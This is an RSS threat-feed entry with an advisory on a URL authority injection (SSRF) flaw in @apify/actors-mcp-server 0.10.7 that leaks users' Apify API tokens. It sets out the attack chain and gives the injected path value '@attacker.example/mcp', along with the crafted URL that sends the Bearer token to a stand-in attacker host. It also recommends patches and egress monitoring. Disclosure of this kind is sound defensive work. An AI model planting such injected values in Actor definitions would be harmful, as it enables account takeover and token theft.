<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>@Apify/Actors-Mcp-Server (0.10.7) - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/@apify/actors-mcp-server-0.10.7/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Fri, 03 Jul 2026 12:22:45 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/@apify/actors-mcp-server-0.10.7/feed.xml" rel="self" type="application/rss+xml"/><item><title>Apify Model Context Protocol (MCP) server: Actor MCP path authority injection leaks Apify token</title><link>https://feed.craftedsignal.io/briefs/2026-07-apify-mcp-token-leak/</link><pubDate>Fri, 03 Jul 2026 12:22:45 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-apify-mcp-token-leak/</guid><description>An attacker can exploit a Server-Side Request Forgery (SSRF) vulnerability in `@apify/actors-mcp-server` version `0.10.7` by crafting a malicious Actor definition to inject an arbitrary authority into a URL, causing the MCP client to exfiltrate the victim's Apify API token to the attacker's server, granting full access to their Apify account.</description><content:encoded><![CDATA[<p>A critical Server-Side Request Forgery (SSRF) vulnerability, tracked as GHSA-6gr2-qh89-hxwm, exists in <code>@apify/actors-mcp-server</code> version <code>0.10.7</code> and earlier. This flaw allows an attacker to exfiltrate Apify API tokens from users who interact with a specially crafted malicious Actor. The vulnerability stems from improper validation of the <code>webServerMcpPath</code> value, which is sourced from an attacker-controlled Actor definition. By injecting an authority (e.g., <code>@attacker.example/mcp</code>) into this path, an attacker can redirect the MCP client's outbound connection to an arbitrary host. Crucially, the MCP client unconditionally attaches the victim's <code>Authorization: Bearer &lt;APIFY_TOKEN&gt;</code> header to these outbound connections, leading to the silent exfiltration of the API token. This grants the attacker full access to the victim's Apify account, enabling actions such as running and managing Actors, accessing stored data, and incurring compute charges, without requiring special privileges or code execution on the victim's machine.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker publishes a malicious Actor on the Apify platform, crafting its definition to include a <code>webServerMcpPath</code> value designed for URL authority injection (e.g., <code>@attacker.example/mcp</code>).</li>
<li>A victim, running <code>@apify/actors-mcp-server</code> (version <code>0.10.7</code> or earlier) and configured with an Apify API token, initiates an MCP tool call (e.g., <code>call-actor</code> or <code>fetch-actor-details</code>) targeting the attacker-controlled Actor.</li>
<li>The <code>apifyToken</code> is resolved from environment variables, server options, or the MCP request's <code>_meta.apifyToken</code>.</li>
<li>The application fetches the attacker's Actor definition from the Apify API, retrieving the malicious <code>webServerMcpPath</code>.</li>
<li>The <code>getActorMCPServerURL()</code> function receives the <code>webServerMcpPath</code>, trims and splits it, but crucially performs no validation against authority injection.</li>
<li>The function then concatenates a trusted <code>standbyUrl</code> with the malicious <code>mcpServerPath</code>, creating an authority-injected URL (e.g., <code>https://real-actor-id.apify.actor@attacker.example/mcp</code>).</li>
<li>The <code>connectMCPClient()</code> function is invoked with this crafted URL and the victim's Apify API token.</li>
<li>The <code>connectMCPClient()</code> then establishes an outbound HTTP connection to the attacker's server (<code>attacker.example</code>), sending the victim's <code>Authorization: Bearer &lt;APIFY_TOKEN&gt;</code> header, thereby exfiltrating the token.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Any user of <code>@apify/actors-mcp-server</code> versions prior to <code>0.10.8</code> who has an Apify API token configured and is induced to invoke an MCP tool against an attacker-controlled Actor will have their Apify API token silently exfiltrated. The exfiltrated token grants the attacker full administrative access to the victim's Apify account, allowing them to run, manage, and modify Actors, access sensitive data stored within the account, and potentially incur significant compute charges. The attack requires no special privileges on the victim's side and no code execution on their machine, only the interaction with a malicious Actor on the Apify platform, posing a significant risk to the integrity and confidentiality of user accounts.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately update <code>@apify/actors-mcp-server</code> to version <code>0.10.8</code> or newer to remediate the URL authority injection vulnerability (GHSA-6gr2-qh89-hxwm).</li>
<li>Implement strict outbound network egress filtering to prevent unauthorized connections to unknown or untrusted domains, specifically monitoring for connections from <code>@apify/actors-mcp-server</code> processes that contain <code>Authorization: Bearer</code> headers directed to domains other than <code>*.apify.com</code> or other explicitly allowed Apify infrastructure.</li>
<li>Consider using dedicated network monitoring tools to detect connections to suspicious IP addresses or domains (e.g., <code>attacker.example</code> or <code>127.0.0.1</code> as seen in PoC) from your Apify infrastructure.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssp-injection</category><category>ssrf</category><category>token-exfiltration</category><category>npm-package</category><category>cloud</category><category>saas</category></item></channel></rss>